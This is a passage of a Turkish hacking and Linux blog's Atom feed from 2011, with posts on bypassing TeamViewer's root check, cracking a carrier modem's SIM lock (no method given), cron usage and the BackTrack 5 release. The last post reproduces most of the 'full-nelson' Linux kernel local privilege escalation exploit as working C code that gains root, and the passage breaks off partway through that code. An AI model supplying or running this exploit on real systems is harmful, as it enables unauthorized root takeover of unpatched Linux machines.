/&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;_&lt;br /&gt;" root@bt:~/Desktop/teamviewer/teamviewer6# ./teamviewer &lt;br /&gt;&lt;br /&gt;TeamViewer must not be executed as root! "&lt;br /&gt;&lt;/pre&gt;Artık buna bash script hatasımı desem saçmalıkmı desem bilmiyorum gerçi sorun demeye şahit lazım yinede bilmeyen arkadaşlar guugılda aratırda bulamaz diye bu dökümanı yazıyorum.. Basit bir yol mevcut .&lt;br /&gt;&lt;br /&gt;Herhangi bir editor ile teamviewer dosyasını açın. üst kısımda ;&lt;br /&gt;&lt;br /&gt;Orjinal KOD :&lt;br /&gt;&lt;pre class="brush:php"&gt;if [ $userid = 0 ]&lt;br /&gt;then&lt;br /&gt;        echo TeamViewer must not be executed as root!&lt;br /&gt;        exit 1&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Şöyle bir koda rastlayacaksınız . Bu şarta bağlanmış bir açılışı ifade ediyor. &lt;br /&gt;userid 0 ise kendini açma gibisinden saçma sapan bir kod eklenmiş. yani uid değiştirildiği zaman program açılacaktır.&lt;br /&gt;UID değiştirilmiş kod örneği :&lt;br /&gt;&lt;pre class="brush:php"&gt;if [ $userid = 66666 ]&lt;br /&gt;then&lt;br /&gt;        echo TeamViewer must not be executed as root!&lt;br /&gt;        exit 1&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;Gibisinden bir değişiklik ile programın açılmasını sağlayabilirsiniz yada dilerseniz kod kısmında verdiğim alanı tamamen silerekde programın çalışmasını sağlayabilirsiniz.&lt;br /&gt;&lt;br /&gt;Kolay gelsin .&lt;br /&gt;&lt;br /&gt;Bu Döküman FreWaL Tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-754698905262682628?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/754698905262682628/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/teamviewer-must-not-be-executed-as-root.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/754698905262682628'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/754698905262682628'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/teamviewer-must-not-be-executed-as-root.html' title='TeamViewer must not be executed as root! Hatası ve Çözümü'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-3518142339768772373</id><published>2011-05-19T10:00:00.000-07:00</published><updated>2011-05-19T11:04:23.433-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sim kilidi kırma'/><category scheme='http://www.blogger.com/atom/ns#' term='jet modem kırma'/><category scheme='http://www.blogger.com/atom/ns#' term='simlock kırma'/><category scheme='http://www.blogger.com/atom/ns#' term='avea jet modem sim lock kırma'/><title type='text'>Av Zamanı ( isyanlardayım )</title><content type='html'>Detaya girmek istemiyorum Zira başımı ağırtmak istemiyorum. İşlerim dolayısı ile&lt;br /&gt;şehir dışındayım , bir arkadasa verdiğim sözü tutabilmek için internete ihtiyacım vardı . Avea nın kampanyası ile&lt;br /&gt;tahaütsüz jet modem aldım . Ancak google bile 15 dakikada açılıyordu. Jet modemde farklı hat kullanma yasağı mevcut yani farklı bir hat kullanabilmek için imei ye göre sim kilit kodu talebinde bulunuyorsunuz. Bende o talepte bulundum 5. ayın 1 inde bulunduğum talep üzerine 18 gün geçmesine rağmen geri dönüş yapılmadı .&lt;br /&gt;Doğal olarak isyan ettim . Kısa bir analizden sonra sim lock kodunu kırmayı başardım . Yalnız bu işlemi nasıl yaptığım hakkında hiç bir şekilde bilgi vermeyeceğim. Çünkü modemi tahaütlü alanlar 1 seneden önce simlock kodunu talep edemiyor.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&amp;nbsp;Siz siz olun jet modemi oly ile analiz etmeyin şifre falan avlamaya çalışmayın .&amp;nbsp; bu arada aveanın zta ile ortak çalıştığınıda söylemek istemiyorum :) . &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Qo8GYpJmLP0/TdTZ-SGUtyI/AAAAAAAAAAY/VtnjrQyXalI/s1600/12.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://1.bp.blogspot.com/-Qo8GYpJmLP0/TdTZ-SGUtyI/AAAAAAAAAAY/VtnjrQyXalI/s200/12.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Burdan aveaya sesleniyorum&lt;br /&gt;Siz halen sim lock kodunu göndereceksizniz. atı alan fizanı geçti.&lt;br /&gt;:)&lt;br /&gt;DİP NOT : Yandaki resimi sadece göstermelik olsun diye çektim çektim .hata mesajına göre text lerde gerekli yeri arayıp kodlarda karşılaştırma sağlayan bir yer sakın aramayın . O zaman şifreyi bulacağınızı söylemek istemiyorum.Assemblyden hiç çakmıyorsanız denemeyin bile. Ayrıca 5 hatalı giriş yaparsanız modemin bloke olacağını unutmayın.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-3518142339768772373?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/3518142339768772373/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/av-zaman-isyanlardaym.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3518142339768772373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3518142339768772373'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/av-zaman-isyanlardaym.html' title='Av Zamanı ( isyanlardayım )'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-Qo8GYpJmLP0/TdTZ-SGUtyI/AAAAAAAAAAY/VtnjrQyXalI/s72-c/12.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-5850370462979757314</id><published>2011-05-19T04:00:00.000-07:00</published><updated>2011-05-20T16:58:49.117-07:00</updated><title type='text'>Cron işlemleri</title><content type='html'>Cron Linux / Unix sistemlerde zamanlanmış görevleri ifade eder. Bu konu hakkında döküman çok ancak&lt;br /&gt;&amp;nbsp;(ç)Alıntı olmasından kaynaklı anlatımlarda hatalar çok fazla . Detaya girmek istemiyorum.&lt;br /&gt;Cron Girdilerini editleme ( ekleme/çıkarma/düzenleme ) için : crontab -e&lt;br /&gt;Cron Girdilerini Listeleme &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : crontab -l&lt;br /&gt;Bütün Cron Girdilerini Siler &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : crontab -r &lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Normal şartlarda crontab'ı editlemeye çalışırsanız kendisini öntanımlı text editoru olan vi ile açmaya çalışacaktır. vi benim pek tutmadığım bir editor o yüzden ön tanımlı editörü nano yapmanızda fayda var diyorum. Yapmasını bilmeyen arkadaşlar için&amp;nbsp; export EDITOR=nano komutunu uygulamak yeterli olacaktır .&lt;br /&gt;Yine ben vi kullanmak istiyorum diyen arkadaşlar için ;&lt;br /&gt;crontab -e dedikten sonra i tuşuna basarak insert moduna geçebilirsiniz. Daha sonra eklemek istediğiniz komutu yazıp 1 kere esc basmanız yeterli olacaktır . böylece insert modulunden çıkmış olacaksınız. değişiklikleri kaydetmek için shift + z yi kullanmanız gerekecek.&lt;br /&gt;&lt;br /&gt;Yazacağım yazı acemilere yönelik olacağı için command not found gibisinden bir uyarı ile karşılaşırsanız . ( nano kullanmak istiyorum diyenler için söylüyorum )&amp;nbsp; Kullandığınız sisteme göre komutu kurunuz .&lt;br /&gt;&lt;br /&gt;Hemen Konumuza geri dönelim.&lt;br /&gt;&lt;br /&gt;*&amp;nbsp; *&amp;nbsp; *&amp;nbsp; *&amp;nbsp; * sh /root/script.sh yada *&amp;nbsp; *&amp;nbsp; *&amp;nbsp; *&amp;nbsp; * reboot ' iki farklı örnek burada * ile gördükleriniz zamanı temsil ederken sonrasında gelen yazı komutu temsil etmektedir.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;daha açıklayıcı olmaya çalışırsak ;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;________________ Dakika (0 - 59)&lt;br /&gt;|   _____________ Saat (0 - 23)&lt;br /&gt;|  |   __________ Ayın Günleri (1 - 31)&lt;br /&gt;|  |  |   _______ Ay (1 - 12)&lt;br /&gt;|  |  |  |   ____ Haftanın Günleri (0 - 6) (Pazar=0 ya da 7)&lt;br /&gt;|  |  |  |  |&lt;br /&gt;*  *  *  *  *  Komut&lt;/pre&gt;&lt;/pre&gt;&lt;br /&gt;Örnekler ile pekiştirmeye çalışalım :&amp;nbsp; &lt;br /&gt;&lt;pre class='brush:php'&gt;30 Dakikada Bir Çalışacak Cron Girdisi&lt;br /&gt;&lt;br /&gt;*/30 * * * * reboot ' her 30 dakikada bir makineye reboot atacaktır.&lt;br /&gt;&lt;/pre&gt;&lt;pre class='brush:php'&gt;Her öğlenden sora 13 ve akşam 21 ′de Çalışacak ve makineye reboot atacak Cron Girdisi&lt;br /&gt;00 12,21 * * * reboot&lt;br /&gt;&lt;/pre&gt;&lt;pre class='brush:php'&gt;Sabah 5 Akşam 24 Arasında Saat başı  Çalışacak ve makineye reboot atacak Cron Girdisi&lt;br /&gt;00 05-24 * * * reboot&lt;br /&gt;&lt;/pre&gt;&lt;pre class='brush:php'&gt;Haftanın günlerinden 3. gün ve 6. gün ( çarşamba ve cumartesi ) Sabah 5 Akşam 24 Arasında her Saat başı Çalışacak ve makineye reboot atacak Cron Girdisi&lt;br /&gt;00 05-24 * * 3-6 reboot&lt;br /&gt;&lt;/pre&gt;&lt;pre class='brush:php'&gt;Crontab Haftanın Günleri :&lt;br /&gt;pazar : 0, pazartesi&amp;nbsp; : 1, salı : 2, çarşamba : 3, perşembe : 4, cuma : 5, cumartesi : 6 &lt;br /&gt;&lt;/pre&gt;Bu Döküman FreWaL Tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-5850370462979757314?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/5850370462979757314/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/cron-islemleri.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/5850370462979757314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/5850370462979757314'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/cron-islemleri.html' title='Cron işlemleri'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-2845074572840711899</id><published>2011-05-18T07:42:00.000-07:00</published><updated>2011-05-20T16:48:09.062-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='backtrack 5'/><category scheme='http://www.blogger.com/atom/ns#' term='backtrack'/><title type='text'>BackTrack 5 Çıktı.</title><content type='html'>Vazgeçilmezim BackTrack ile Üniversite yıllarımda&amp;nbsp; 2007 - 2008 sezonunda bedava internet arayışında iken tanıştık , ancak mükemelliğinin farkına vardıktan sora bırakamaz oldum. sürüm 2 den bu yanadır kullanmaktayım . 5 Sürümünde remote exploit grubu kendini iyice aşmış ( Diyebilirim. )&lt;br /&gt;Daha önceleri KDE olarak sunulan backtrack , 5 sürümünde&amp;nbsp; KDE 4.6 yada gnome 2.6 ( masaüstü ortamı ) şeklinde seçenekler sunmuş . Sisteminize göre 32 yada 64 bit olarak indirebilirsiniz .&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.backtrack-linux.org/downloads/" target="_blank"&gt;BACKTRACK İNDİR&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-2845074572840711899?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/2845074572840711899/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/backtrack-5-ckt.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2845074572840711899'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2845074572840711899'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/backtrack-5-ckt.html' title='BackTrack 5 Çıktı.'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-3723289940023563931</id><published>2011-05-18T07:12:00.000-07:00</published><updated>2011-05-20T17:01:45.304-07:00</updated><title type='text'>Linux Kernel Local Address Limit Override Security Weakness</title><content type='html'>Security Focus Güvenlik ekibinin bildirimine göre Linux 2.6.x sürümlerinde bir güvenlik zaafiyeti bulunuyor. Exploitin referans kısmına bakıldığı zaman ;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;* resides in valid userspace by invoking access_ok().  However, Nelson&lt;br /&gt;* discovered that when the kernel performs an address limit override via&lt;br /&gt;* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,&lt;br /&gt;* etc.), this override is not reverted before calling put_user() in the exit&lt;br /&gt;* path, allowing a user to write a NULL word to an arbitrary kernel address.&lt;br /&gt;* Note that this issue requires an additional vulnerability to trigger.&lt;/pre&gt;&lt;pre&gt;&lt;a name='more'&gt;&lt;/a&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Şeklinde bir yazı gözümüze çarpıyor ; set_fs() fonksiyonu işlevini yerine&lt;/pre&gt;&lt;pre&gt;getirmeye çalışırken access_ok() fonksiyonu oyun bozanlık yapıyor ve işlevini&lt;/pre&gt;&lt;pre&gt;doğru bir şekilde gerçekleştiremiyor . Sunucuya yapılacak Local saldırılarda&lt;/pre&gt;&lt;pre&gt;Tabiri caiz ise ( root denemelerinde ) user yetkisi roota çekilebiliyor.&lt;/pre&gt;&lt;pre&gt;Buda sunucu sahiplerini zor duruma düşürebiliyor .&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Exploiti aşağıda vermiş olduğum URL den kontrol edebilirsiniz. &lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;Orjinal Link : http://downloads.securityfocus.com/vulnerabilities/exploits/full-nelson.c&lt;br /&gt;&lt;pre class='brush:php'&gt;/*&lt;br /&gt; * Linux Kernel &lt;= 2.6.37 local privilege escalation&lt;br /&gt; * by Dan Rosenberg&lt;br /&gt; * @djrbliss on twitter&lt;br /&gt; *&lt;br /&gt; * Usage:&lt;br /&gt; * gcc full-nelson.c -o full-nelson&lt;br /&gt; * ./full-nelson&lt;br /&gt; *&lt;br /&gt; * This exploit leverages three vulnerabilities to get root, all of which were&lt;br /&gt; * discovered by Nelson Elhage:&lt;br /&gt; *&lt;br /&gt; * CVE-2010-4258&lt;br /&gt; * -------------&lt;br /&gt; * This is the interesting one, and the reason I wrote this exploit.  If a&lt;br /&gt; * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL&lt;br /&gt; * word will be written to a user-specified pointer when that thread exits.&lt;br /&gt; * This write is done using put_user(), which ensures the provided destination&lt;br /&gt; * resides in valid userspace by invoking access_ok().  However, Nelson&lt;br /&gt; * discovered that when the kernel performs an address limit override via&lt;br /&gt; * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,&lt;br /&gt; * etc.), this override is not reverted before calling put_user() in the exit&lt;br /&gt; * path, allowing a user to write a NULL word to an arbitrary kernel address.&lt;br /&gt; * Note that this issue requires an additional vulnerability to trigger.&lt;br /&gt; *&lt;br /&gt; * CVE-2010-3849&lt;br /&gt; * -------------&lt;br /&gt; * This is a NULL pointer dereference in the Econet protocol.  By itself, it's&lt;br /&gt; * fairly benign as a local denial-of-service.  It's a perfect candidate to&lt;br /&gt; * trigger the above issue, since it's reachable via sock_no_sendpage(), which&lt;br /&gt; * subsequently calls sendmsg under KERNEL_DS.&lt;br /&gt; *&lt;br /&gt; * CVE-2010-3850&lt;br /&gt; * -------------&lt;br /&gt; * I wouldn't be able to reach the NULL pointer dereference and trigger the&lt;br /&gt; * OOPS if users weren't able to assign Econet addresses to arbitrary&lt;br /&gt; * interfaces due to a missing capabilities check.&lt;br /&gt; *&lt;br /&gt; * In the interest of public safety, this exploit was specifically designed to&lt;br /&gt; * be limited:&lt;br /&gt; *&lt;br /&gt; *  * The particular symbols I resolve are not exported on Slackware or Debian&lt;br /&gt; *  * Red Hat does not support Econet by default&lt;br /&gt; *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and&lt;br /&gt; *    Debian&lt;br /&gt; *&lt;br /&gt; * However, the important issue, CVE-2010-4258, affects everyone, and it would&lt;br /&gt; * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly&lt;br /&gt; * more sophisticated version of this that doesn't have the roadblocks I put in&lt;br /&gt; * to prevent abuse by script kiddies.&lt;br /&gt; *&lt;br /&gt; * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.&lt;br /&gt; *&lt;br /&gt; * NOTE: the exploit process will deadlock and stay in a zombie state after you&lt;br /&gt; * exit your root shell because the Econet thread OOPSes while holding the&lt;br /&gt; * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.&lt;br /&gt; *&lt;br /&gt; * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla&lt;br /&gt; */&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;fcntl.h&gt;&lt;br /&gt;#include &lt;sys/ioctl.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;net/if.h&gt;&lt;br /&gt;#include &lt;sched.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;signal.h&gt;&lt;br /&gt;#include &lt;sys/utsname.h&gt;&lt;br /&gt;#include &lt;sys/mman.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;&lt;br /&gt;/* How many bytes should we clear in our&lt;br /&gt; * function pointer to put it into userspace? */&lt;br /&gt;#ifdef __x86_64__&lt;br /&gt;#define SHIFT 24&lt;br /&gt;#define OFFSET 3&lt;br /&gt;#else&lt;br /&gt;#define SHIFT 8&lt;br /&gt;#define OFFSET 1&lt;br /&gt;#endif&lt;br /&gt;&lt;br /&gt;/* thanks spender... */&lt;br /&gt;unsigned long get_kernel_sym(char *name)&lt;br /&gt;{&lt;br /&gt;        FILE *f;&lt;br /&gt;        unsigned long addr;&lt;br /&gt;        char dummy;&lt;br /&gt;        char sname[512];&lt;br /&gt;        struct utsname ver;&lt;br /&gt;        int ret;&lt;br /&gt;        int rep = 0;&lt;br /&gt;        int oldstyle = 0;&lt;br /&gt;&lt;br /&gt;        f = fopen("/proc/kallsyms", "r");&lt;br /&gt;        if (f == NULL) {&lt;br /&gt;                f = fopen("/proc/ksyms", "r");&lt;br /&gt;                if (f == NULL)&lt;br /&gt;                        goto fallback;&lt;br /&gt;                oldstyle = 1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;repeat:&lt;br /&gt;        ret = 0;&lt;br /&gt;        while(ret != EOF) {&lt;br /&gt;                if (!oldstyle)&lt;br /&gt;                        ret = fscanf(f, "%p %c %s\n", (void **)&amp;addr, &amp;dummy, sname);&lt;br /&gt;                else {&lt;br /&gt;                        ret = fscanf(f, "%p %s\n", (void **)&amp;addr, sname);&lt;br /&gt;                        if (ret == 2) {&lt;br /&gt;                                char *p;&lt;br /&gt;                                if (strstr(sname, "_O/") || strstr(sname, "_S."))&lt;br /&gt;                                        continue;&lt;br /&gt;                                p = strrchr(sname, '_');&lt;br /&gt;                                if (p &gt; ((char *)sname + 5) &amp;&amp; !strncmp(p - 3, "smp", 3)) {&lt;br /&gt;                                        p = p - 4;&lt;br /&gt;                                        while (p &gt; (char *)sname &amp;&amp; *(p - 1) == '_')&lt;br /&gt;                                                p--;&lt;br /&gt;                                        *p = '\0';&lt;br /&gt;                                }&lt;br /&gt;                        }&lt;br /&gt;                }&lt;br /&gt;                if (ret == 0) {&lt;br /&gt;                        fscanf(f, "%s\n", sname);&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt;                if (!strcmp(name, sname)) {&lt;br /&gt;                        fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");&lt;br /&gt;                        fclose(f);&lt;br /&gt;                        return addr;&lt;br /&gt;                }&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        fclose(f);&lt;br /&gt;        if (rep)&lt;br /&gt;                return 0;&lt;br /&gt;fallback:&lt;br /&gt;        uname(&amp;ver);&lt;br /&gt;        if (strncmp(ver.release, "2.6", 3))&lt;br /&gt;                oldstyle = 1;&lt;br /&gt;        sprintf(sname, "/boot/System.map-%s", ver.release);&lt;br /&gt;        f = fopen(sname, "r");&lt;br /&gt;        if (f == NULL)&lt;br /&gt;                return 0;&lt;br /&gt;        rep = 1;&lt;br /&gt;        goto repeat;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);&lt;br /&gt;typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);&lt;br /&gt;_commit_creds commit_creds;&lt;br /&gt;_prepare_kernel_cred prepare_kernel_cred;&lt;br /&gt;&lt;br /&gt;static int __attribute__((regparm(3)))&lt;br /&gt;getroot(void * file, void * vma)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;        commit_creds(prepare_kernel_cred(0));&lt;br /&gt;        return -1;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* Why do I do this?  Because on x86-64, the address of&lt;br /&gt; * commit_creds and prepare_kernel_cred are loaded relative&lt;br /&gt; * to rip, which means I can't just copy the above payload&lt;br /&gt; * into my landing area. */&lt;br /&gt;void __attribute__((regparm(3)))&lt;br /&gt;trampoline()&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;#ifdef __x86_64__&lt;br /&gt;        asm("mov $getroot, %rax; call *%rax;");&lt;br /&gt;#else&lt;br /&gt;        asm("mov $getroot, %eax; call *%eax;");&lt;br /&gt;#endif&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* Triggers a NULL pointer dereference in econet_sendmsg&lt;br /&gt; * via sock_no_sendpage, so it's under KERNEL_DS */&lt;br /&gt;int trigger(int * fildes)&lt;br /&gt;{&lt;br /&gt;        int ret;&lt;br /&gt;        struct ifreq ifr;&lt;br /&gt;&lt;br /&gt;        memset(&amp;ifr, 0, sizeof(ifr));&lt;br /&gt;        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);&lt;br /&gt;&lt;br /&gt;        ret = ioctl(fildes[2], SIOCSIFADDR, &amp;ifr);&lt;br /&gt;&lt;br /&gt;        if(ret &lt; 0) {&lt;br /&gt;                printf("[*] Failed to set Econet address.\n");&lt;br /&gt;                return -1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);&lt;br /&gt;        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);&lt;br /&gt;&lt;br /&gt;        /* Shouldn't get here... */&lt;br /&gt;        exit(0);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main(int argc, char * argv[])&lt;br /&gt;{&lt;br /&gt;        unsigned long econet_ops, econet_ioctl, target, landing;&lt;br /&gt;        int fildes[4], pid;&lt;br /&gt;        void * newstack, * payload;&lt;br /&gt;&lt;br /&gt;        /* Create file descriptors now so there are two&lt;br /&gt;           references to them after cloning...otherwise&lt;br /&gt;           the child will never return because it&lt;br /&gt;           deadlocks when trying to unlock various&lt;br /&gt;           mutexes after OOPSing */&lt;br /&gt;        pipe(fildes);&lt;br /&gt;        fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);&lt;br /&gt;        fildes[3] = open("/dev/zero", O_RDONLY);&lt;br /&gt;&lt;br /&gt;        if(fildes[0] &lt; 0 || fildes[1] &lt; 0 || fildes[2] &lt; 0 || fildes[3] &lt; 0) {&lt;br /&gt;                printf("[*] Failed to open file descriptors.\n");&lt;br /&gt;                return -1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        /* Resolve addresses of relevant symbols */&lt;br /&gt;        printf("[*] Resolving kernel addresses...\n");&lt;br /&gt;        econet_ioctl = get_kernel_sym("econet_ioctl");&lt;br /&gt;        econet_ops = get_kernel_sym("econet_ops");&lt;br /&gt;        commit_creds = (_commit_creds) get_kernel_sym("commit_creds");&lt;br /&gt;        prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");&lt;br /&gt;&lt;br /&gt;        if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {&lt;br /&gt;                printf("[*] Failed to resolve kernel symbols.\n");&lt;br /&gt;                return -1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        if(!(newstack = malloc(65536))) {&lt;br /&gt;                printf("[*] Failed to allocate memory.\n");&lt;br /&gt;                return -1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        printf("[*] Calculating target...\n");&lt;br /&gt;        target = econet_ops + 10 * sizeof(void *) - OFFSET;&lt;br /&gt;&lt;br /&gt;        /* Clear the higher bits */&lt;br /&gt;        landing = econet_ioctl &lt;&lt; SHIFT &gt;&gt; SHIFT;&lt;br /&gt;&lt;br /&gt;        payload = mmap((void *)(landing &amp; ~0xfff), 2 * 4096,&lt;br /&gt;                       PROT_READ | PROT_WRITE | PROT_EXEC,&lt;br /&gt;                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);&lt;br /&gt;&lt;br /&gt;        if ((long)payload == -1) {&lt;br /&gt;                printf("[*] Failed to mmap() at target address.\n");&lt;br /&gt;                return -1;&lt;br /&gt;        }&lt;br /&gt;&lt;br /&gt;        memcpy((void *)landing, &amp;trampoline, 1024);&lt;br /&gt;&lt;br /&gt;        clone((int (*)(void *))trigger,&lt;br /&gt;              (void *)((unsigned long)newstack + 65536),&lt;br /&gt;              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,&lt;br /&gt;              &amp;fildes, NULL, NULL, target);&lt;br 